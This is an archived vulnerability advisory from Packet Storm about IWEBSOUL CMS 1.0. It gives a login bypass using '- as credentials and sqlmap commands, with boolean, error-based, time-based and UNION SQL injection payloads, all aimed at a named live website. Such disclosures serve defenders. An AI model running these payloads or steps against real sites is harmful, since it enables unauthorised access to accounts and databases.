what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IWEBSOUL CMS 1.0 SQL Injection

IWEBSOUL CMS 1.0 SQL Injection
Posted Sep 7, 2017
Authored by Renzi

IWEBSOUL CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | 279f6a68f97865d9b1e02a9e64e3562399f5ad05334f727efe3b28c967e80167

IWEBSOUL CMS 1.0 SQL Injection

Change Mirror Download
Title:
=======

IWEBSOUL CMS - Multiple SQL Injection Vulnerabilities & Authentication Bypass

Introduction:
==============

Intrepid Websoul Private Limited - iWebsoul is a rapidly growing IT Solution provider in India.
Team comprehensively works to create a unique business and industry based solution for their customers.
They customize solutions and tailor it according to the needs of our clients keeping in mind their vision and target audience.[iWbeSoul]

Vulnerability Disclosure:
==========================

2017-09-06: Public Disclosure

Affected Product(s):
=====================

IWEBSOUL CMS 1.0

Exploitation Technique:
========================

Remote

Severity Level:
================

High

Technical Details & Description:
=================================

An auth bypass session vulnerability has been discovered in the IWEBSOUL CMS 1.0 web-application.
The session vulnerability allows remote attackers to unauthorized access the web user interface.
The vulnerability is located in the session credentials request of the login.php file. Remote attackers are able to use a '- SQL Injection payload to bypass the login.php script validation.
This is results in unauthorized access. The issue is a classic auth bypass and is remote exploitable. The request method to inject is POST.

Request Method(s):

[+] POST

Vulnerable Funcitons(s):

[+] login.php

Affected Module(s):

[+] Web User Interface


A remote SQL Injection web vulnerability has been discovered in the IWEBSOUL CMS 1.0 web-application.
The vulnerability allows remote attackers to execute own sql commands to compromise the web-server or dbms.
The vulnerability is located in the `type` parameter of the `service-detail.php` file GET method request.


Request Method(s):

[+] GET

Vulnerable Function(s):

[+] service-detail.php

Vulnerable Parameter(s):

[+] type

And the other SQL injection is located in the `catid`, 'scatid' & 'typeid' parameters of the `product.php` file GET method request.

Request Method(s):

[+] GET

Vulnerable Function(s):

[+] product.php

Vulnerable Parameter(s):

[+] catid

[+] scatid

[+] typeid

More SQL Injection is located in the 'id' paramater of the 'offerproductdisplay.php' file GET method request.

Request Method(s):

[+] GET

Vulnerable Function(s):

[+] offerproductdisplay.php

Vulnerable Parameter(s):

[+] id

Proof of Concept (PoC):
========================

An Auth bypass vulnerability can be exploited by remote attackers without privilege application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability.

1 . Open the vulnerable web-app
2 . Start to browse the website and go to http://www.bumalow.com/login.php
3 . Enter Username:'-
4 . Enter Password:'-
5 . Now you will login with the credentials
6 . Successful reproduce of the auth bypass login vulnerability!


The remote sql-injection vulnerability can be exploited by remote attackers with privilege web-application user account and without user interaction.
The security demonstration reproduce the web vulnerability exploitation using SQLmap.


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com/service-detail.php?type=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: type (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: type=-7101' OR 4159=4159#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: type=1' OR (SELECT 2319 FROM(SELECT COUNT(*),CONCAT(0x716b707071,(SELECT (ELT(2319=2319,1))),0x716b717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HVPB

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: type=1' OR SLEEP(5)-- dKVd
---


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com/product.php?catid=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: catid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: catid=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: catid=1 UNION ALL SELECT CONCAT(0x71786a6271,0x68686e537353764743507264565a7a6673496f70454f7475655846614e5243664f68634a57414761,0x7176787671),NULL,NULL,NULL-- jApP
---


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com//offerproductdisplay.php?id=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
Solution
=========

In order to avoid SQL Injection it is important to validate all non-SQL text entries, not allowing special characters and SQL key words to be written, such as INSERT, DELETE, UPDATE, HAVING, JOIN, etc.
It is interesting to set a maximum of characters for passwords and users.
Treat errors appropriately, for messages that do not expose attackers to information about a data structure.

Credits
========

Felipe "Renzi" Gabriel

Contact
========

renzi@linuxmail.org

References
==========

https://www.owasp.org/index.php/Top_10_2013-A1-Injection
https://www.iwebsoul.com/about-iwebsoul.php
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close